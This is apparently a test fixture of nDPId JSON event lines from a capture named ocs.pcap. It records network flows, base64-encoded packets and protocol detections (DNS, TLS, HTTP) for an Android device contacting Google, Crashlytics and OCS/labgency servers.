+00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"ocs.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1449652787155,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":60,"pkt_l4_len":40,"thread_ts_msec":1449652787155,"pkt":"RQAAPCFMQABABqbowKi0AhcV5seZXwG7KAKjIAAAAACgAjkIsy4AAAIEBbQEAggKADWC0AAAAAABAwMG"} +00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"ocs.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1449652787273,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":52,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":52,"pkt_l4_len":32,"thread_ts_msec":1449652787273,"pkt":"RQAANCFNQABABqbvwKi0AhcV5seZXwG7KAKjIVpZIEyAEADl\/h4AAAEBCAoANYLbl2cJ1g=="} +00980{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"ocs.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1449652786152,"flow_last_seen":1449652787289,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":221,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1449652787289,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"23.21.230.199","src_port":39263,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Crashlytics","breed":"Acceptable","category":"DataTransfer"},"tls": {"version":"TLSv1","client_requested_server_name":"settings.crashlytics.com","ja3":"b030dba3ca09e2e484b9fa75adc4039c","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"ocs.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652787507,"flow_last_seen":1449652787507,"flow_idle_time":180000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1449652787507,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":3621,"dst_port":53,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"ocs.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1449652787507,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":77,"pkt_l4_len":57,"thread_ts_msec":1449652787507,"pkt":"RQAATYLzQABAETLywKi0AggICAgOJQA1ADki+CcDAQAAAQAAAAAAAAR4bXBwCGRldmljZTA2BGV1MDEIY2FwcHRhaW4DY29tAAABAAE="} +00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"ocs.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652787507,"flow_last_seen":1449652787507,"flow_idle_time":180000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1449652787507,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":3621,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"xmpp.device06.eu01.capptain.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":48,"source":"ocs.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652787596,"flow_last_seen":1449652787596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1449652787596,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"137.135.131.52","src_port":46166,"dst_port":5122,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"ocs.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1449652787596,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":60,"pkt_l4_len":40,"thread_ts_msec":1449652787596,"pkt":"RQAAPDy4QABABnydwKi0AomHgzS0VhQCr\/++QwAAAACgAjkI08UAAAIEBbQEAggKADWC+wAAAAABAwMG"} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":53,"source":"ocs.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652787983,"flow_last_seen":1449652787983,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1449652787983,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"178.248.208.54","src_port":49881,"dst_port":80,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"ocs.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1449652787983,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":60,"pkt_l4_len":40,"thread_ts_msec":1449652787983,"pkt":"RQAAPMDbQABABoIGwKi0ArL40DbC2QBQ64tD+QAAAACgAjkIoRgAAAIEBbQEAggKADWDIgAAAAABAwMG"} +00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":54,"source":"ocs.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652788016,"flow_last_seen":1449652788016,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1449652788016,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":2589,"dst_port":53,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"ocs.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1449652788016,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":61,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":61,"pkt_l4_len":41,"thread_ts_msec":1449652788016,"pkt":"RQAAPYMlQABAETLQwKi0AggICAgKHQA1ACmDzlLQAQAAAQAAAAAAAANvY3MIbGFiZ2VuY3kCd3MAAAEAAQ=="} +00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"ocs.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652788016,"flow_last_seen":1449652788016,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1449652788016,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":2589,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.OCS","breed":"Fun","category":"Media"},"dns": {"query":"ocs.labgency.ws","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"ocs.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1449652788067,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":52,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":52,"pkt_l4_len":32,"thread_ts_msec":1449652788067,"pkt":"RQAANMDcQABABoINwKi0ArL40DbC2QBQ64tD+t7mVuSAEADljSkAAAEBCAoANYMrRwX98w=="} +01332{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"ocs.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1449652788082,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":715,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":715,"pkt_l4_len":695,"thread_ts_msec":1449652788082,"pkt":"RQACy8DdQABABn91wKi0ArL40DbC2QBQ64tD+t7mVuSAGADltWEAAAEBCAoANYMsRwX981BPU1QgL2NhdGFsb2cvdm9kP3Y9MyBIVFRQLzEuMQ0KWC1MZ3ktSHNzLUE6IEZGRTg2OUEyLTMzQUQtQTU0QS1CRUMwLTcyMTBEMDNDODM1Qi0yNTk0RDYzRA0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpYLUxneS1IU1MtU2VydmljZS1JZDogb2ZyLm9jcw0KWC1MZ3ktSFNTLVJvbS1JZDogc2Ftc3VuZy9HVC1QNzUxMC9BbmRyb2lkLzQuMC40L1hXTFA2L2FybXY3bF8xMDAwLjBNSHpfMTk5OC44NEJvZ29NaXBzX2ZlYXR1cmVzKHN3cCxoYWxmLHRodW1iLGZhc3RtdWx0LHZmcCxlZHNwLHZmcHYzLHZmcHYzZDE2LHRscylfY29yZXM9Mi8xMjgweDc1Mi9mYWxzZQ0KQ29udGVudC1MZW5ndGg6IDIxNw0KSG9zdDogb2N1MDMubGFiZ2VuY3kud3MNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IEFwYWNoZS1IdHRwQ2xpZW50L1VOQVZBSUxBQkxFIChqYXZhIDEuNCkNCg0KPD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz4KPGxneXJlcXVlc3QgbW9kdWxlPSJDTS9WT0QiPgoJPGFjdGlvbiBuYW1lPSJnZXRDYXRhbG9nRW50cmllcyI+CgkJPHBhcmFtIG5hbWU9IndpdGhDdXN0b21EYXRhIiB2YWx1ZT0iZmFsc2UiLz4KCQk8cGFyYW0gbmFtZT0iZXh0ZXJuYWxJZCIgdmFsdWU9ImZhbHNlIi8+Cgk8L2FjdGlvbj4KPC9sZ3lyZXF1ZXN0Pg=="} +00803{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"ocs.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1449652787983,"flow_last_seen":1449652788082,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":663,"flow_tot_l4_payload_len":663,"flow_avg_l4_payload_len":221,"midstream":0,"thread_ts_msec":1449652788082,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"178.248.208.54","src_port":49881,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCS","breed":"Fun","category":"Media"},"http": {"hostname":"ocu03.labgency.ws","url":"ocu03.labgency.ws\/catalog\/vod?v=3","code":0,"content_type":"","user_agent":"Apache-HttpClient\/UNAVAILABLE (java 1.4)"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"ocs.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652788109,"flow_last_seen":1449652788109,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1449652788109,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"178.248.208.54","src_port":36680,"dst_port":443,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"ocs.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1449652788109,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":60,"pkt_l4_len":40,"thread_ts_msec":1449652788109,"pkt":"RQAAPDlmQABABgl8wKi0ArL40DaPSAG7xoy6SQAAAACgAjkIgeAAAAIEBbQEAggKADWDLwAAAAABAwMG"} +00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"ocs.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1449652788188,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":52,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":52,"pkt_l4_len":32,"thread_ts_msec":1449652788188,"pkt":"RQAANDlnQABABgmDwKi0ArL40DaPSAG7xoy6Sjpn3PmAEADljD4AAAEBCAoANYM3RwX+EQ=="} +00725{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"ocs.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1449652788195,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":260,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":260,"pkt_l4_len":240,"thread_ts_msec":1449652788195,"pkt":"RQABBDloQABABgiywKi0ArL40DaPSAG7xoy6Sjpn3PmAGADlDAsAAAEBCAoANYM3RwX+ERYDAQDLAQAAxwMBVmhd83GqZqYQO3oMbwUHPK3VU0gJzqNSdwnP4gncj8QAAEYABAAFAC8ANcACwATABcAMwA7AD8AHwAnACsARwBPAFAAzADkAMgA4AArAA8ANwAjAEgAWABMACQAVABIAAwAIABQAEQD\/AQAAWAAAABQAEgAAD29jcy5sYWJnZW5jeS53cwALAAQDAAECAAoANAAyAAEAAgADAAQABQAGAAcACAAJAAoACwAMAA0ADgAPABAAEQASABMAFAAVABYAFwAYABk="} +00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"ocs.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1449652788109,"flow_last_seen":1449652788195,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1449652788195,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"178.248.208.54","src_port":36680,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.OCS","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1","client_requested_server_name":"ocs.labgency.ws","ja3":"0534a22b266a64a5cc9a90f7b5c483cc","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"ocs.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1449652788595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":60,"pkt_l4_len":40,"thread_ts_msec":1449652788595,"pkt":"RQAAPDy5QABABnycwKi0AomHgzS0VhQCr\/++QwAAAACgAjkI02AAAAIEBbQEAggKADWDYAAAAAABAwMG"} +00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":109,"source":"ocs.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1449652790602,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":60,"pkt_l4_len":40,"thread_ts_msec":1449652790602,"pkt":"RQAAPDy6QABABnybwKi0AomHgzS0VhQCr\/++QwAAAACgAjkI0pgAAAIEBbQEAggKADWEKAAAAAABAwMG"} +00812{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":112,"source":"ocs.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1449652787983,"flow_last_seen":1449652790713,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":663,"flow_tot_l4_payload_len":663,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1449652790713,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"178.248.208.54","src_port":49881,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCS","breed":"Fun","category":"Media"},"http": {"hostname":"ocu03.labgency.ws","url":"ocu03.labgency.ws\/catalog\/vod?v=3","code":0,"content_type":"","user_agent":"Apache-HttpClient\/UNAVAILABLE (java 1.4)"}} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":175,"source":"ocs.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1449652792355,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":60,"pkt_l4_len":40,"thread_ts_msec":1449652792355,"pkt":"RQAAPKb0QABABiV3wKi0AkDpuLy6UxRsAv3YCQAAAACgAjkIcdQAAAIEBbQEAggKADWE2AAAAAABAwMG"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":241,"source":"ocs.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652797357,"flow_last_seen":1449652797357,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1449652797357,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"64.233.184.188","src_port":32946,"dst_port":443,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":241,"source":"ocs.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1449652797357,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":60,"pkt_l4_len":40,"thread_ts_msec":1449652797357,"pkt":"RQAAPAMUQABABslXwKi0AkDpuLyAsgG7QZiF2AAAAACgAjkIz8gAAAIEBbQEAggKADWGzAAAAAABAwMG"} +00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":242,"source":"ocs.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1449652797427,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":52,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":52,"pkt_l4_len":32,"thread_ts_msec":1449652797427,"pkt":"RQAANAMVQABABslewKi0AkDpuLyAsgG7QZiF2aTu9RqAEADl+L8AAAEBCAoANYbSHkOFlA=="} +00744{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":243,"source":"ocs.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1449652797442,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":271,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":271,"pkt_l4_len":251,"thread_ts_msec":1449652797442,"pkt":"RQABDwMWQABABsiCwKi0AkDpuLyAsgG7QZiF2aTu9RqAGADlVfIAAAEBCAoANYbUHkOFlBYDAQDWAQAA0gMD4HuK+eOlMdUOH1cZsMt60He+NukWbTB7f1JNaYrt+NsAACjAK8AswC\/AMACeAJ\/ACcAKwBPAFAAzADnAB8ARAJwAnQAvADUABQD\/AQAAgQAAABUAEwAAEG10YWxrLmdvb2dsZS5jb20ACwAEAwABAgAKADQAMgAOAA0AGQALAAwAGAAJAAoAFgAXAAgABgAHABQAFQAEAAUAEgATAAEAAgADAA8AEAARACMAAAANACAAHgYBBgIGAwUBBQIFAwQBBAIEAwMBAwIDAwIBAgICAw=="} +00969{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":243,"source":"ocs.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1449652797357,"flow_last_seen":1449652797442,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":219,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1449652797442,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"64.233.184.188","src_port":32946,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mtalk.google.com","ja3":"75edb912bc6f0a222ae3e3e47f5c89b1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":269,"source":"ocs.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652798230,"flow_last_seen":1449652798230,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1449652798230,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":11793,"dst_port":53,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":269,"source":"ocs.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1449652798230,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":65,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":65,"pkt_l4_len":45,"thread_ts_msec":1449652798230,"pkt":"RQAAQYcjQABAES7OwKi0AggICAguEQA1AC1oEnazAQAAAQAAAAAAAARwbGF5Cmdvb2dsZWFwaXMDY29tAAABAAE="} +00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":269,"source":"ocs.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652798230,"flow_last_seen":1449652798230,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1449652798230,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":11793,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"play.googleapis.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":270,"source":"ocs.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652798305,"flow_last_seen":1449652798305,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1449652798305,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"64.233.166.95","src_port":47803,"dst_port":443,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":270,"source":"ocs.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1449652798305,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":60,"pkt_l4_len":40,"thread_ts_msec":1449652798305,"pkt":"RQAAPHAIQABABm7AwKi0AkDppl+6uwG7gNP3IgAAAACgAjkI9zgAAAIEBbQEAggKADWHKgAAAAABAwMG"} +00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":271,"source":"ocs.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1449652798386,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":52,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":52,"pkt_l4_len":32,"thread_ts_msec":1449652798386,"pkt":"RQAANHAJQABABm7HwKi0AkDppl+6uwG7gNP3IxI082eAEADlT7wAAAEBCAoANYczAMsH6w=="} +00696{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":272,"source":"ocs.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1449652798392,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":236,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":236,"pkt_l4_len":216,"thread_ts_msec":1449652798392,"pkt":"RQAA7HAKQABABm4OwKi0AkDppl+6uwG7gNP3IxI082eAGADln0MAAAEBCAoANYczAMsH6xYDAQCzAQAArwMBVmhd\/avXwE9Hbo+g4bJoaBoe\/PaQpNdc4O0Q8a7HcbYAAEYABAAFAC8ANcACwATABcAMwA7AD8AHwAnACsARwBPAFAAzADkAMgA4AArAA8ANwAjAEgAWABMACQAVABIAAwAIABQAEQD\/AQAAQAALAAQDAAECAAoANAAyAAEAAgADAAQABQAGAAcACAAJAAoACwAMAA0ADgAPABAAEQASABMAFAAVABYAFwAYABk="} +00944{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":272,"source":"ocs.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1449652798305,"flow_last_seen":1449652798392,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1449652798392,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"64.233.166.95","src_port":47803,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"5a236bfc3d18ddef1b1f2f4c9e765d66","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":863,"source":"ocs.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652842535,"flow_last_seen":1449652842535,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1449652842535,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":24245,"dst_port":53,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":863,"source":"ocs.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1449652842535,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":56,"pkt_l4_len":36,"thread_ts_msec":1449652842535,"pkt":"RQAAOJhyQABAER2IwKi0AggICAhetQA1ACRtrFcaAQAAAQAAAAAAAAN3d3cDb2NzAmZyAAABAAE="} 